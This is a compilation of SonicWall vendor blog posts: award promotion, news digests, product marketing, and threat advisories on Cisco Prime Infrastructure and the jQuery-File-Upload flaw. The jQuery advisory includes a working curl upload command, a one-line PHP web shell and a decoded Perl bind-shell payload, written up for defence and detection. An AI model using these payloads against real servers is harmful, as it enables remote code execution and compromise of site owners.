SonicWall’s Steve Pataky Nominated for Channelnomics Innovation Awards 2018, Security Channel Chief of the Year

Steve Pataky, Senior Vice President and Chief Revenue Officer at SonicWall, has been nominated for Security Channel Chief of the Year at the Channelnomics Innovation Awards (CIAs) 2018.

The Channelnomics Innovation Awards (CIAs) are designed to recognize channel players across North America who bring innovation, forward thinking and excitement to the channel. Voting is open now and will remain open until Friday, Nov. 9, at 5 p.m. EST. There is no limit to the number of times you can vote, so please show your support for Steve now!

Why Vote for Steve Pataky?

Steve Pataky is a seasoned channel professional with nearly 30 years of experience architecting and executing global channel and go-to-market strategies, innovative global programs and partner development strategies at scale to generate leverage and partner profitability.

Joining SonicWall in 2016 as Channel Chief and Vice President of worldwide sales, Steve launched the SonicWall SecureFirst Partner Program, a vital driving force in growing SonicWall’s partner community, which has surged to over 18,000 channel partners in over 215 countries and territories.

In 2017, Steve spearheaded the introduction of SonicWall University, which boasts over 500 unique courses across three role-based accreditations and has already served over 100,000 hours of training. SecureFirst Partners have been growing POS 21% year/year after course completion, and SecureFirst Registered Partners have been experiencing POS growth of 30% year/year after course completion.

Already on the CRN top 100 Executives list for 2018, Pataky has been a persistent channel advocate named as one of the 50 Most Influential Channel Chiefs in 2014, 2015, 2017 and 2018. To SonicWall and its partners, Steve has consistently shown commitment to ensure that SonicWall always puts its partners first when developing strategies and priorities.

As a constant supporter of the idea “100 percent channel, 100 percent security, 100 percent of the time,” Steve embodies what it means to be this year’s Security Channel Chief of the Year.

About the Channelnomics Innovation Awards:

Now in its third year, the Channelnomics Innovation Awards (CIAs) are designed to recognize channel players across North America who bring innovation, forward thinking and excitement to the channel.

With over 30 categories to choose from, recognizing achievements for solution providers, distributors and vendors – there’s something for everyone, no matter your role in the channel.

The awards are completely independent and based solely on innovation and achievement in the North American channel over the past year.

Channelnomics is a licensed brand of The 2112 Strategy Group, LLC.

Vote Now

Cast your vote for Steve Pataky before Friday, Nov. 9, at 5 p.m. EST. There is no limit to the number of times you can vote, so please show your support for Steve now!

Critical flaw in the Cisco Prime Infrastructure leads to arbitrary file upload and command execution

Cisco Prime Infrastructure:

Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users – all from one place.

Vulnerability | Arbitrary File Upload and Command Execution:

CVE-2018-15379 – The HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions, allowing an unauthenticated, remote attacker to upload an arbitrary file. This file can later be executed by the attacker at the privilege level of the user. The vulnerability is due to incorrect permission settings for system directories. An attacker could exploit this vulnerability by uploading a malicious file using TFTP (Trivial File Transfer Protocol), which can later be accessed via the web interface. Successful exploitation could result in the execution of arbitrary code in the context of the prime user.

Technical Details:

Most web applications running on the Cisco Prime Infrastructure (CPI)  virtual appliance are deployed under ‘/opt/CSCOlumos/apache-tomcat-<Version>/webapps’. Since the autoDeploy parameter in the Tomcat server.xml for CPI is set to true for the default virtual host, any directory within the “webapps” directory will be deployed as a web application. One of these applications is “swimtemp”, which symlinks to /localdisk/tftp which is where files uploaded by TFTP are located.

rwxrwxrwx. 1 root admin  swimtemp -> /localdisk/tftp/

By default, the TFTP server in Cisco Prime Infrastructure allows uploads, and because TFTP has no login or access control mechanisms, any user with network connectivity to the TFTP port may upload arbitrary files. Files uploaded via TFTP are placed in the directory ‘/localdisk/tftp’.

As a result, an attacker can upload a malicious file using a TFTP client to the ‘/localdisk/tftp/’ directory. The malicious file will be available at https://<IP>/swimtemp/<web shell>. The attacker can then visit this URI to execute the code in the context of the “prime” user, which is an unprivileged user that runs the Apache Tomcat server.
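The condition described above (an auto-deploying Tomcat host whose webapps directory contains a symlink to a world-writable upload directory) can be audited on any Tomcat host. The following is an added example, not code from Cisco or from the original post; the server.xml fragment and the directory layout it checks are constructed in a temporary directory, and the function names are hypothetical.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed server.xml fragment (not copied from a real appliance).
SAMPLE_SERVER_XML = """<Server>
  <Service name="Catalina">
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" autoDeploy="true"/>
    </Engine>
  </Service>
</Server>"""


def autodeploy_hosts(server_xml_text):
    """Return (host name, appBase) for every <Host> that auto-deploys.

    Tomcat treats a missing autoDeploy attribute as true, so only an
    explicit autoDeploy="false" turns the behaviour off.
    """
    root = ET.fromstring(server_xml_text)
    hosts = []
    for host in root.iter("Host"):
        if host.get("autoDeploy", "true").strip().lower() != "false":
            hosts.append((host.get("name", ""), host.get("appBase", "webapps")))
    return hosts


def risky_webapp_links(webapps_dir):
    """List symlinks in webapps_dir that resolve outside of it.

    Each finding records whether the link target is world-writable, which
    is the combination that exposed /localdisk/tftp through "swimtemp".
    """
    base = os.path.realpath(webapps_dir)
    findings = []
    for entry in sorted(os.listdir(webapps_dir)):
        path = os.path.join(webapps_dir, entry)
        if not os.path.islink(path):
            continue
        target = os.path.realpath(path)
        if os.path.commonpath([base, target]) == base:
            continue  # link stays inside the webapps tree
        try:
            mode = os.stat(target).st_mode
        except OSError:
            mode = None  # dangling link: report it, but not as writable
        findings.append({
            "app": entry,
            "target": target,
            "world_writable": bool(mode is not None and mode & stat.S_IWOTH),
        })
    return findings


def build_sample_layout(root):
    """Create a constructed layout mirroring the one in the post."""
    webapps = os.path.join(root, "webapps")
    tftp = os.path.join(root, "localdisk", "tftp")
    os.makedirs(os.path.join(webapps, "ROOT"))
    os.makedirs(tftp)
    os.chmod(tftp, 0o777)  # world-writable, like the TFTP upload directory
    os.symlink(tftp, os.path.join(webapps, "swimtemp"))
    return webapps


if __name__ == "__main__":
    print("auto-deploying hosts:", autodeploy_hosts(SAMPLE_SERVER_XML))
    with tempfile.TemporaryDirectory() as tmp:
        for finding in risky_webapp_links(build_sample_layout(tmp)):
            print(finding)
```

A finding with world_writable set to true on a host that also appears in autodeploy_hosts() is the case worth escalating, since anything written to the target becomes reachable through the web application.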


Affected Products:

Cisco Prime Infrastructure 3.2 and later

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13851 Cisco Prime Infrastructure TFTP Arbitrary File Upload 1
  • IPS: 13852 Cisco Prime Infrastructure TFTP Arbitrary File Upload 2

SymmiWare Ransomware will only decrypt after Nov 25th

The SonicWall Capture Labs Threat Research Team have recently spotted a ransomware trojan calling itself SymmiWare.  There have been other malware named “Symmi” in the past, however, this ransomware does not appear to be related.  SymmiWare is unusual in that the operators are only offering decryption after November 25th 2018.  The supplied email address in the ransom note is not currently active but is expected to be after this date.

Infection Cycle:

The trojan uses the following icon:

Upon running the executable the trojan reports the infection to a remote server:

The trojan encrypts files on the system and appends “.SYMMYWARE” to the file extension of each encrypted file.  It also drops SYMMYWARE.TXT into every directory containing encrypted files.

SYMMYWARE.TXT contains the following text:

 

We tried to contact the operators via simmyware@protonmail.ch but as stated in the above message the address is not yet active:

 

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Symmi.RSM (Trojan)

Cyber Security News & Trends – 11-02-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Channelnomics Innovation Awards – Channelnomics

  • SonicWall’s Steve Pataky is up for Security Channel Chief of the Year, vote for him today!

British Airways Confirms Theft of Additional Data – Silicon (UK)

  • In light of many recent high-profile breaches, SonicWall CEO Bill Conner spoke to Silicon about the responsibility that companies bear when guarding customer data.

2018 ChannelPro SMB All-Stars – ChannelPro

  • SonicWall has been named one of the ChannelPro 2018 SMB All-Stars, an award that honors organizations that do something “truly special” with “significant impact on the SMB channel.”

Cyber Security News

Canada’s Mandatory Breach Notification Rules Now in Effect – Bank Info Security

  • As of Nov. 1, Canadian organizations must record all data breaches, big or small, and report major ones. Records must be kept for at least two years.

Radisson Hotel Group Suffers Data Breach, Customer Info Leaked  – ZDNet

  • Loyalty members of the Radisson Hotel Group have email addresses, phone numbers and more leaked. No financial data is said to be exposed.

White House Sets Deadlines for Agencies to Protect Their Digital Crown Jewels – NextGov

  • Homeland Security has until April 2019 to develop a tool that will map cybersecurity problems in federal agencies following a report in May of this year that found that up to three-quarters of federal agencies were at risk of a breach.

Nice Work if You Can Get It: GandCrab Ransomware Nets Millions Even Though It Has Been Broken – The Register

  • There’s a free decryption tool now available if you’re caught by GandCrab, but in the past 3 months alone the ransomware is still estimated to have netted its owners $300 million.

Mirai Co-Author Gets 6 Months Confinement, $8.6M in Fines for Rutgers Attacks – Krebs On Security

  • The convicted co-author of the Mirai botnet malware has been sentenced to 2,500 hours of community service, six months home confinement and ordered to pay $8.6 million for his use of Mirai in attacks against Rutgers University, New Jersey.

Assault and Battery: Malvertising Campaign Checks User Device’ Charge as Anti-Detection Technique – SC Magazine

  • JuiceChecker-3PC is a clever mobile malware that doesn’t run when a phone battery is low or high in an attempt to avoid detection by security programs that are activated when a phone is charging.

Magecart Claims Fresh Victim in Electronics Kit Seller Kitronik – ZDNet

  • Magecart’s prolific streak continues as electronics outlet Kitronik joins British Airways and Ticketmaster in confirming that it has been hit by the malware. Data exposed this time includes complete card details, names and addresses.

In Case You Missed It

Cybersecurity for SMBs: Bundled Network Security Delivers Cost-Effective Protection

If you’re a small- or medium-sized business (SMB), don’t bury your head in the digital sand. Cybercriminals don’t discriminate. Your data, credentials or access could be valuable to them in ways not immediately apparent. SMB cybersecurity is critical.

Unfortunately, SMBs also haven’t received the necessary guidance in terms of government support. That’s alarming since in September 2018 alone, the average SonicWall customer faced 1,662 malware attacks. For the year, SonicWall recorded 8.5 billion malware attacks globally — a 54 percent increase over 2017.

There is good news, however. In August 2018, President Trump signed into law the new NIST Small Business Cybersecurity Act. New legislation in Canada and the UK brings hope for similar protections.

But in many cases, cybersecurity guidance isn’t immediately available. In the U.S., for example, NIST has a year to deliver the guidance (read our eBook to learn more). Regardless of geographic location, a year is a long time for SMBs to wait to either enhance or begin their cybersecurity strategy. For this reason, SonicWall has created cost-effective cybersecurity bundles tailored specifically for SMBs.

Bundled Security for SMBs

The SonicWall TotalSecure SMB Bundle* provides robust cybersecurity technology and services that defend growing SMBs from the volume and sophistication of modern cyberattacks.

The tailored package includes high-performance network security, endpoint protection, cloud sandbox, content filtering, online management and more. Admins can also use powerful reporting functions to easily check the health of the network and endpoints and remediate threats if ever needed.

What’s included What you get
  • Perimeter firewall protection, including SSL traffic inspection
  • Intrusion prevention
  • Content filtering
  • Zero-day defense via Capture ATP with RTDMI
  • Behavior-based endpoint security
  • Endpoint rollback (Windows only)
  • Advanced reporting and attack visualization

Bundled Security for Small Offices

The SonicWall TotalSecure SMB Bundle* also is available for small or home offices. It provides foundational cybersecurity tools that help smaller organizations mitigate cyberattacks from the perimeter to the endpoint.

It’s a comprehensive, out-of-the-box solution to stop cyberattacks, help remediate issues, protect endpoints and manage security — easily and efficiently.

What’s included What you get
  • Perimeter firewall protection, including SSL/TLS traffic inspection
  • Intrusion prevention
  • Content Filtering Service
  • Behavior-based endpoint security
  • Endpoint rollback (Windows only)
  • Advanced reporting and attack visualization

SonicWall has been protecting SMBs for more than 27 years. SonicWall is the No. 2 cybersecurity vendor in the SMB space, according to Gartner’s Market Share: Unified Threat Management (SMB Multifunction Firewalls), Worldwide, 2017 report.

Contact SonicWall to build or enhance your cybersecurity posture for true end-to-end protection from today’s most malicious cyberattacks, including never-before-seen threats.

Lock In Your SMB Bundle

It’s time to use real-time cybersecurity to protect your business from cyberattacks. Contact a SonicWall security expert today. We’re ready to help you build a sound, cost-effective security strategy that’s just right for your business.

* Please contact SonicWall or your SonicWall SecureFirst partner for regional availability.

jQuery plugin vulnerability actively exploited for a few years

A widely used jQuery plugin, ‘jQuery-File-Upload’, also called Blueimp, contains a critical vulnerability that allows attackers to perform remote code execution. This vulnerability has been in existence for several years and potentially places 7,800 web applications forked from this project at risk. Hackers have been actively exploiting this vulnerability, but it was disclosed only recently. SonicWall Threat Research Lab has researched this vulnerability to provide protection to our users.

jQuery-File-Upload:

jQuery File upload is a plugin that provides multiple file selection, drag and drop support, progress bar, validation and preview images, audio and video for jQuery. It supports cross-domain, chunked and resumable file uploads. It works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. 
Figure 1: Sample web page implemented using Blueimp jQuery File Upload plugin

Vulnerability | Remote Code Execution: 

CVE-2018-9206  – An arbitrary file upload vulnerability has been reported in the PHP Upload Handler of jQuery File Upload Plugin. This vulnerability is due to lack of sanitization of file types uploaded to an application using the plugin.

The back-end PHP code “UploadHandler.php” under server/php/ handles requests from the JavaScript front end. It doesn’t perform any validation of the files uploaded to the server, and it doesn’t exclude any file types by default, so any file type can be uploaded, including executable files with .php extensions.

The javascript front end sends POST requests to index.php that in turn loads the UploadHandler class from UploadHandler.php. Files are then written to the server/php/files directory.

A remote attacker can exploit this vulnerability by uploading a crafted PHP file to an application implementing the vulnerable plugin. Successful exploitation could result in the execution of arbitrary code in the context of the user running the web application.

How to Exploit:

In the below sample code, malicious shell code “shell.php” gets uploaded to the server. Later it can be run in the context of the web user.

curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET['cmd']; system($cmd);?>

As mentioned earlier, this vulnerability has been known to hackers for years. After some digging, we got hold of some real exploits used by attackers a few months ago, before the disclosure was made.

 

Figure 2: Traffic captured from the real exploit attempted on 2018-06-03

 

In this exploit, the attacker sends a POST request to “/themes/dashboard/assets/plugins/jquery-file-upload/server/php” with the upload file “OFWTvRbsmCC.php” to write to the server directory. The content of the malicious PHP upload file is given below.

Shell code within the php is obfuscated using base64 encoding. Decoded base64 text is given below

After decoding further, the deobfuscated final code is retrieved

“$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,17788,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>’” is the metasploit payload to generate the bind shell via perl.

Bind shell is a type of shell in which the attacker opens up a communication port or a listener on the victim machine and makes it wait for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.

Are you affected:

You are affected if you

  • Use jQuery File Upload < v9.24.1 on a Webserver that executes files with .php as part of the file extension (e.g. “example.php.png”)
  • Use jQuery File Upload < v9.22.1 on a Webserver that executes files with the file extension .php
  • Did not configure your Webserver to not execute files in the upload directory (server/php/files).
  • Are running Apache v2.3.9+ with the default AllowOverride Directive set to None or another Webserver with no .htaccess support.

Fix:

  • Upgrade to the latest version of jQuery File Upload
  • Configure your web server to not execute files in the upload directory

Refer to vendor advisory:  https://github.com/blueimp/jQuery-File-Upload/blob/master/VULNERABILITIES.md#remote-code-execution-vulnerability-in-the-php-component
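To check whether a server has already been hit, web access logs can be searched for the pattern described above: a POST to the plugin's server/php handler, followed by a successful request for a stored file that carries .php in its extension. The following is an added example, not code from the original post or from the plugin's author; it assumes Apache combined log format, and the log lines, client addresses and timestamps are constructed around the path and file name quoted in the post.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines; the IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2018:10:15:02 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 310 "-" "-"
203.0.113.7 - - [03/Jun/2018:10:15:04 +0000] "GET /themes/dashboard/assets/plugins/jquery-file-upload/server/php/files/OFWTvRbsmCC.php HTTP/1.1" 200 0 "-" "-"
198.51.100.20 - - [03/Jun/2018:10:20:11 +0000] "POST /jQuery-File-Upload-9.22.0/server/php/index.php HTTP/1.1" 200 295 "-" "-"
198.51.100.20 - - [03/Jun/2018:10:20:15 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/holiday.jpg HTTP/1.1" 200 48211 "-" "-"
198.51.100.21 - - [03/Jun/2018:10:21:40 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/example.php.png HTTP/1.1" 200 120 "-" "-"
192.0.2.55 - - [03/Jun/2018:10:30:00 +0000] "GET /uploads/server/php/files/probe.php HTTP/1.1" 404 196 "-" "-"
""".splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The upload handler: .../server/php, .../server/php/ or .../server/php/index.php
HANDLER_RE = re.compile(r'^(?P<base>.*/server/php)(?:/(?:index\.php)?)?$', re.I)
# A stored upload: .../server/php/files/<name>
STORED_RE = re.compile(r'^(?P<base>.*/server/php)/files/(?P<name>[^/]+)$', re.I)


def php_extension_kind(name):
    """Classify a stored file name by where 'php' sits in its extension.

    "final" -> the last extension is .php (shell.php)
    "inner" -> .php is part of the extension (example.php.png)
    None    -> no php extension component
    """
    parts = name.lower().split(".")[1:]
    if not parts:
        return None
    if parts[-1] == "php":
        return "final"
    if "php" in parts[:-1]:
        return "inner"
    return None


def find_upload_abuse(lines):
    """Return successful requests for PHP-named files in the upload directory."""
    uploads = {}   # handler base path -> clients that POSTed to it
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        path = unquote(urlsplit(m["target"]).path)
        status = int(m["status"])
        handler = HANDLER_RE.match(path)
        if m["method"] == "POST" and handler and status < 400:
            uploads.setdefault(handler["base"].lower(), set()).add(m["ip"])
            continue
        stored = STORED_RE.match(path)
        if not stored or status != 200:
            continue
        kind = php_extension_kind(stored["name"])
        if kind is None:
            continue
        base = stored["base"].lower()
        findings.append({
            "client": m["ip"],
            "time": m["ts"],
            "file": stored["name"],
            "kind": kind,
            # True when an upload POST to the same handler was logged earlier
            "upload_seen": base in uploads,
            "uploaders": sorted(uploads.get(base, ())),
        })
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A status of 200 only shows that the file was served; whether it was executed depends on the web server configuration listed under "Are you affected", so each finding should be followed by an inspection of the file in server/php/files.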

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13669 jQuery File Upload Remote Code Execution
  • IPS: 9679 PolarPearCms Remote Code Execution
  • WAF: 1686 jQuery File Upload Remote Code Execution

Cyber Security News & Trends – 10-26-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Privacy Problems for FANG Companies Might Beget M&A Action in Cybersecurity – The Street

  • SonicWall CEO Bill Conner predicts that large tech companies and social media giants will look to mergers and acquisitions (M&A) to address the shortage of available cyber security talent and stave off further punishment and damages caused by breaches and other cyber security incidents.

WSJ Report: Facebook Breach the Work of Spammers, Not Nation-State Actors – Dark Reading

  • Lawrence Pingree offers his perspective on the most recent Facebook breach revelations.

Cyber Security News

Apple CEO Condemns ‘Data-Industrial Complex’ – The Wall Street Journal

  • Apple CEO Tim Cook is calling for new digital privacy laws in the United States to be drawn up, warning that the collection of huge amounts of private and everyday information is being “weaponized against us with military efficiency.”

EU Takes Step Toward Cyberattack Sanctions – Dark Reading

  • The European Union has approved a proposal to place further sanctions on nations proven to have carried out a cyberattack.

Cathay Pacific Says Data of 9.4 Million Passengers Stolen in Hack – The Telegraph (UK)

  • Hong Kong airline Cathay Pacific has suffered a breach affecting up to 9.4 million passengers, including over three quarters of a million passport numbers.

Super Micro to Review Hardware for Malicious Chips – Reuters

  • Super Micro is agreeing to review their hardware in the wake of reports that the Chinese authorities are placing spying chips in their hardware. They deny all the allegations.

Who Is Agent Tesla? – Krebs on Security

  • Openly available for commercial license, Agent Tesla is classified by many as password-stealing malware. Krebs on Security investigates the not-so-well-hidden identity of Agent Tesla’s creator following a 100 percent usage increase of the program in August 2018.

Yahoo to Pay $50M, Other Costs for Massive Security Breach – Associated Press

  • The fallout from the biggest security breach of all time looks to be finally drawing to a close.

Magecart Cybergang Targets 0days in Third-Party Magento Extensions – Threat Post

  • Magecart, the malware behind the Ticketmaster and British Airways breaches, continues to be updated and reconfigured, now targeting unpatched vulnerabilities in third-party plugins used in the Magento e-commerce platform.

In Case You Missed It

EDUCAUSE 2018: SonicWall Heads to Denver

The EDUCAUSE Annual Conference hosts the best minds in higher education IT. The event empowers professionals and technology providers from around the world to network, share ideas, grow professionally and discover solutions to solve today’s cybersecurity and IT challenges. And we’re going to be there.

EDUCAUSE 2018

Oct. 30 – Nov. 1

Booth 1003
Colorado Convention Center
Denver, Colo.

Join SonicWall at EDUCAUSE, Oct. 30-Nov. 1, at the Colorado Convention Center in Denver, Colo. Meet SonicWall security experts at Booth 1003, where we are joining long-time partner Dell on the conference floor.

Safeguarding many of the world’s best-known universities, SonicWall empowers security teams with the full breadth of high-performance, scalable security solutions and services that allow educators to realize the promise of tech-savvy learning and research environments.

To demonstrate these capabilities, SonicWall will showcase key solutions to better protect institutions of higher education.

Demo 1: Email Security & Content Protection

SonicWall Email Security, which is available for G Suite and Office 365, helps eliminate email-borne spam, phishing, viruses, spyware and data leaks. It’s also integrated with the SonicWall Capture Advanced Threat Protection (ATP) cloud sandbox to inspect and mitigate malicious attachments and URLs. The demo will feature:

Demo 2: Analytics & Visibility

The SonicWall Capture Security Center helps higher education institutions unify security governance, compliance and risk management. By establishing a holistic, connected approach to security orchestration, Capture Security Center can federate all operational aspects of the SonicWall security ecosystem. It also delivers campus IT admins real-time analytics and risk scores.

Available on SonicWall next-generation firewalls, integrated DPI-SSL technology can decrypt and inspect SSL/TLS traffic for encrypted threats, and Capture ATP delivers AI protection for block-until-verdict mitigation against both known and unknown cyberattacks. The demo will feature:

Event Program Tracks

EDUCAUSE conference content is carefully crafted and curated by institutional and industry presenters. Event discussions are categorized into the following tracks:

Experience EDUCAUSE Online

Can’t make the event in Denver? Experience the conference online with Encore! The EDUCAUSE Annual Conference 2018. The online program features the highest-rated, member-driven content organized across key areas of community interest.

Just like the actual conference, Encore! is tailored for higher ed IT professionals with over 50 presenters, 33 sessions and over 24 hours of session content, including content captured from the featured sessions in Denver.

Bypassing Government Security Controls with Customized Malware

For a moment, think from the perspective of someone who wants to hack a government organization. Think of what they want to do. Seize critical records, encrypt the drive and hold it for ransom? Convert part of a resource into a cryptocurrency mining operation? Or, worse yet, attempt to disrupt or take down critical infrastructure (e.g., utilities, transportation systems, defense)?

As we explore the final theme of National Cybersecurity Awareness Month, “Safeguarding the Nation’s Critical Infrastructure,” I thought it would be valuable to go to a reliable source.

To get a better perspective of threats to critical infrastructure I interviewed a skilled hacker. This is his plan.

Recon & Recode

First, he said he would do reconnaissance on the organization to look for potential vulnerabilities. Makes sense.

But his next step is concerning. He’d take a form of malware he’d used before — or another he finds for sale in an exploit kit designed to abuse a vulnerability — and customize it for that specific organization. Customization can be as simple as making a few cosmetic changes to the code or changing the programming to do something slightly different based on previous failed attempts.

This step is important. The new batch of code hasn’t been registered with any firewall vendor, antivirus vendor, security researcher, etc. The targeted organization can’t stop it if their security controls don’t have the ability to conduct behavioral code analysis with zero-day code detonation.

Furthermore, if someone wants to take it to the next level, this code should arrive via an encrypted channel in the hopes that the organization doesn’t do Man-in-the-Middle (MITM) inspection of HTTPS traffic. It can be delivered simply over social media or webmail.

Payload Delivery

Now it’s time for everyone’s favorite part: payload delivery. At the time of writing, I am looking at a publicly accessible online sales lead-generation database. At anyone’s fingertips are millions of names and email addresses for contacts at organizations ranging from airlines and retailers to higher education. The malicious hacker can easily download 5,886 contacts from a state transportation department or 4,142 from a previously attacked Canadian agency.

If he wants, he could send an infected attachment asking some 526 contacts from a Singapore government agency to open it, or bait 2,839 faceless people at an unnamed health department to click on his malicious link.

Despite awareness training and efforts to keep systems up to date and patched, 11 percent of people will open the attachment according to a Verizon study. Within this population, there will be systems that he can infect and use as a launching point to get his malware to a target system — or at least give him backdoor access or a harvested credential to start working manually.

A hacker selects contacts for a phishing scam against an American county department of education.

How to Defend Against Customized Malware

This method is very similar to what we are seeing happen every day. Customized malware is the main reason why SonicWall discovered and stopped over 56 million new forms of malware in 2017.

In a government organization equipped with SonicWall technology, the email may first be stopped by email security based on the domain or other structures of the message, but you can’t take it for granted.

If the malware is delivered via attachment, SonicWall secure email technology can test the file in the Capture ATP cloud sandbox to understand what the file wants to do. SonicWall Email Security can also leverage Capture ATP to scan malicious URLs embedded in phishing attacks.

To learn more about this technology, read “Inside the Cloud Sandbox: How Capture Advanced Threat Protection (ATP) Works” and review the graphic below.

Protecting Endpoints Beyond the Firewall

But what about employees not behind the firewall? What if the malware is encrypted and the administrator did not activate the ability to inspect encrypted traffic (DPI-SSL)? What about an infected domain that serves fileless malware through an infected ad?

The answer to that is SonicWall Capture Client, a behavior-based endpoint security solution. The traditional antivirus (AV) that comes free with computers (e.g., Norton, TrendMicro, McAfee, etc.) is still around, but they only check files that are known to be malicious.

In an era of customized malware and creative distribution techniques, it is nearly obsolete. This is why government organizations in all countries favor using behavior-based antivirus called a number of things like Endpoint Protection Platforms (EPP) or Next-Generation Antivirus (NGAV).

These forms of AV look at what is happening on the system for malicious behavior, which is great against customized malware, fileless malware and infected USB sticks. NGAV solutions don’t require frequent signature updates and know how to look for bad activity and can shut it down, in many cases, before it executes.

In the case of SonicWall Capture Client, it can not only stop things before they happen, but also roll back Windows systems to a known good state if the endpoint is compromised. This is extremely helpful with ransomware since you can restore encrypted files and continue on as if the infection never happened. Also, like I mentioned above, Capture Client also makes use of Capture ATP in order to find and eliminate malware that is waiting to execute.

Ultimately, by using the SonicWall Capture Cloud Platform, government agencies and offices around the world are protected against the onslaught of new malware, which is often designed to penetrate their systems. For more information on what we do, or to conduct a risk-free proof of concept in your environment, please contact us at sales@SonicWall.com or read this solution brief.


About Cybersecurity Awareness Month

The 15th annual National Cybersecurity Awareness Month (NCSAM) highlights user awareness among consumers, students/academia and business. NCSAM 2018 addresses specific challenges and identifies opportunities for behavioral change. It aims to remind everyone that protecting the internet is “Our Shared Responsibility.”

In addition, NCSAM 2018 will shine a spotlight on the critical need to build a strong, cyber secure workforce to help ensure families, communities, businesses and the country’s infrastructure are better protected through four key themes:

  • Oct. 1-5: Make Your Home a Haven for Online Safety
  • Oct. 8-12: Millions of Rewarding Jobs: Educating for a Career in Cybersecurity
  • Oct. 15-19: It’s Everyone’s Job to Ensure Online Safety at Work
  • Oct. 22-26: Safeguarding the Nation’s Critical Infrastructure

Learn more at StaySafeOnline.org.

SonicWall & ConnectWise Simplify Security Management for MSPs

When it comes to running a well-organized managed security service business, managed security providers (MSP) demand effective, repeatable processes and continuous operation optimization as a key part of their business strategy.

Evaluating and deciding on a wide range of operational capabilities is important to developing and delivering the right services — at the right time and for the right cost. These include choosing the right:

  • Technology partner
  • Staff
  • Data center architecture
  • Contractual terms
  • Service-level delivery
  • Go-to-market strategies
  • Back-office automation tools that power the business

To enable this strategy, MSPs face a myriad of business, economic and technical decisions associated with the infrastructure they’re going to develop and business management software they’re going to employ. Establishing a high-valued managed security service requires a solution that integrates modern security with rich management, monitoring and reporting capabilities with leading professional services automation (PSA) software.

This integration should give MSPs visibility and control of their multi-vendor solution environment and help them streamline business operations and reduce operating costs.

To properly empower MSPs, SonicWall introduces Global Management System (GMS) 8.7, bringing greater visibility, manageability and serviceability of network security solutions via integration with industry-leading professional services automation (PSA) tool ConnectWise Manage® software.

With more than 27,000 SecureFirst global channel partners, the GMS-ConnectWise integration is driven by the collective inputs from many years of partner collaborations. The benefits to MSPs are increased visibility into their customers’ data, improved productivity and better overall efficiency.

The combined solution gives MSPs single-portal experience for automated service ticketing and asset synchronization. MSPs can easily and quickly perform and administer these important operational tasks natively within the ConnectWise Manage portal based on set priority and/or severity level.

So, how does this improve MSP operations? Consider the four ways GMS 8.7 and the ConnectWise integration can simplify security management for your customers.

Company Mapping

MSP partners can share selected clients’ profiles between SonicWall GMS and ConnectWise Manage and map all managed SonicWall firewall assets associated with each client within the ConnectWise portal for management and monitoring.

Auto Asset Synchronization Integration

Automatically update the SonicWall security appliances mapped to a client’s account in the ConnectWise Automate portal for asset tracking and usage. Give visibility to client names and device details, such as model, serial, version, active subscription, enrolled dates, service expirations, IP/MAC address and more.

Asset Synchronization

MSPs also gain visibility into asset inventory inside ConnectWise for easier device management. Whenever a new unit is added, a configuration is created for that unit through ConnectWise and the same is stored in GMS. Conversely, whenever a unit is deleted, the configuration created in ConnectWise is deleted and the same is removed from GMS.

Auto Ticketing Service Integration

Create GMS-generated alerts automatically in the ConnectWise Manage ticketing system. Track, document and communicate all open tickets during the correction process until they are resolved and automatically closed.

Ticketing is mapped between the systems. When they are created in GMS, GMS synchronizes to reflect changes to both systems.

Automated Ticketing

ConnectWise can also send status alerts to the stakeholders using various communication tools until a service ticket is acknowledged or closed. These include email, text messages (SMS), phone calls and even iOS & Android push notifications.

With SonicWall, MSPs are working with a technology partner with deep expertise in security technology, operations and processes. Because a vast number of SonicWall partners rely on ConnectWise Manage for their business-management platform, the GMS-ConnectWise integration is the first of many future product integrations to continue servicing our MSP business requirements.